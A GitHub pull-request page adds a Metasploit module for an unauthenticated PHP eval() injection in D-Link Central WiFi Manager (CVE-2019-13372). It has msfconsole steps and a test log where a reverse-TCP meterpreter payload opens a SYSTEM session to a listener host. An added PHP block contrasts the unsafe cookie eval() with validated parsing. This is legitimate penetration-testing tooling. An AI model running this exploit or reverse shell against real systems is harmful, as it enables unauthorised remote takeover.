
Add RCE exploit for CVE-2019-13372 #13994

Merged 8 commits on Aug 18, 2020

Conversation

@red0xff (Contributor) commented Aug 13, 2020

This PR adds a module for CVE-2019-13372, a remote code execution vulnerability in D-Link Central WiFi Manager (CWM-100). It is possible to inject PHP code because a user-controlled cookie is passed to eval() without being sanitized.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Do: use windows/http/dlink_central_wifimanager_rce
  • Do: set RHOSTS [RHOSTS]
  • Set payload options: LHOST, LPORT etc.
  • Check the payload options: show options
  • Do: exploit
  • Verify that you get a shell / meterpreter / that whatever payload you used was executed

Reproducing

A vulnerable version is available from D-Link's vulnerability announcement:

  • The announcement
  • ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip

Things to troubleshoot

  • The meterpreter payload works fine, but for some reason, when I execute the shell command from meterpreter, I get a cmd prompt, and then it hangs.

  • When I try to migrate from meterpreter, I get:

meterpreter > ps

Process List
============

 PID   Name                            User                          Path
 ---   ----                            ----                          ----
 0     System Idle Process             NT AUTHORITY\SYSTEM           System Idle Process
 4     System                          NT AUTHORITY\SYSTEM           System
 168   Central WifiManager Server.exe  reVM-PC\reVM                  Central WifiManager Server.exe
 216   smss.exe                        NT AUTHORITY\SYSTEM           smss.exe
 268   svchost.exe                     NT AUTHORITY\NETWORK SERVICE  svchost.exe
 292   csrss.exe                       NT AUTHORITY\SYSTEM           csrss.exe
 340   wininit.exe                     NT AUTHORITY\SYSTEM           wininit.exe
 352   csrss.exe                       NT AUTHORITY\SYSTEM           csrss.exe
 392   winlogon.exe                    NT AUTHORITY\SYSTEM           winlogon.exe
...

meterpreter > migrate 392
[-] Error running command migrate: NoMethodError undefined method `pid' for nil:NilClass

No idea if that's a bug in PHP payloads, but other common meterpreter commands work fine. I wonder if that's something from this exploit.

Related vulnerabilities

An auxiliary/sqli module for CVE-2019-13372 will be added soon as part of another pull request (using the SQL injection engine I've been working on).
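The root cause named in the description, a cookie value handed to eval(), beside the shape a hardened handler takes. This is an added illustration, not code from D-Link CWM or from the Metasploit module; the cookie name cwm_pref and its JSON "preference" schema are hypothetical placeholders, since the PR only states that a user-controlled cookie reaches eval().

```php
<?php
// Added illustration (not D-Link CWM code, not the module's code).
// Cookie name and schema below are hypothetical placeholders.

// Anti-pattern matching the PR's description: whatever the client put
// in the cookie is executed as PHP. No authentication is involved,
// so any request carrying the header gets code execution.
function load_preference_unsafe(array $cookies)
{
    $raw = $cookies['cwm_pref'] ?? 'null';
    return eval('return ' . $raw . ';');   // never do this with client data
}

// Hardened form: the cookie is opaque data. It is bounded in size,
// parsed with a non-executing decoder, and every field is validated
// against a fixed allow-list / range before use. Anything else falls
// back to safe defaults instead of being interpreted.
function load_preference_safe(array $cookies): array
{
    $defaults = ['lang' => 'en', 'page_size' => 25];
    $raw = $cookies['cwm_pref'] ?? '';
    if ($raw === '' || strlen($raw) > 256) {
        return $defaults;
    }
    $decoded = json_decode($raw, true, 2);   // depth 2: flat object only
    if (!is_array($decoded)) {
        return $defaults;                    // not JSON, or wrong shape
    }
    $out = $defaults;
    $lang = $decoded['lang'] ?? null;
    if (is_string($lang) && in_array($lang, ['en', 'de', 'fr'], true)) {
        $out['lang'] = $lang;
    }
    $size = $decoded['page_size'] ?? null;
    if (is_int($size) && $size >= 1 && $size <= 100) {
        $out['page_size'] = $size;
    }
    return $out;
}

// Constructed sample values. The first carries PHP, not data: the
// unsafe handler would run it, the safe one returns the defaults.
$hostile = ['cwm_pref' => 'phpinfo()'];
$benign  = ['cwm_pref' => '{"lang":"de","page_size":50}'];
var_dump(load_preference_safe($hostile));   // ['lang'=>'en','page_size'=>25]
var_dump(load_preference_safe($benign));    // ['lang'=>'de','page_size'=>50]
```

Note that the fix is not escaping the cookie for eval(); there is no safe way to do that. Client input must never reach an interpreter, and server-side state should be keyed by an opaque session identifier rather than carried in the cookie itself.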

@space-r7 (Contributor) left a comment


Hey @red0xff, thank you for the module! I have just a few suggestions.

red0xff and others added 5 commits August 17, 2020 21:01
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
@space-r7 (Contributor) commented:

Tested successfully on my end:

msf5 > use exploit/windows/http/dlink_central_wifimanager_rce 
[*] Using configured payload php/meterpreter/reverse_tcp
msf5 exploit(windows/http/dlink_central_wifimanager_rce) > set rhost 192.168.37.131
rhost => 192.168.37.131
msf5 exploit(windows/http/dlink_central_wifimanager_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/http/dlink_central_wifimanager_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (38288 bytes) to 192.168.37.131
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.131:54320) at 2020-08-18 09:17:31 -0500

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer    : DESKTOP-AQT4EG1
OS          : Windows NT DESKTOP-AQT4EG1 6.2 build 9200 (Windows 8 Professional Edition) i586
Meterpreter : php/windows

Regarding php meterpreter and migrate, php meterpreter does not support it. shell should work, though.

space-r7 added a commit that referenced this pull request Aug 18, 2020
@space-r7 space-r7 merged commit 0a20a21 into rapid7:master Aug 18, 2020
@space-r7 (Contributor) commented Aug 18, 2020

Release Notes

New module exploits/windows/http/dlink_central_wifimanager_rce targets D-Link Central WiFi Manager software for Windows platforms, achieving unauthenticated code execution on vulnerable targets by sending malicious PHP code via a cookie, which gets passed to eval() without any sanitization (CVE-2019-13372).

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 24, 2020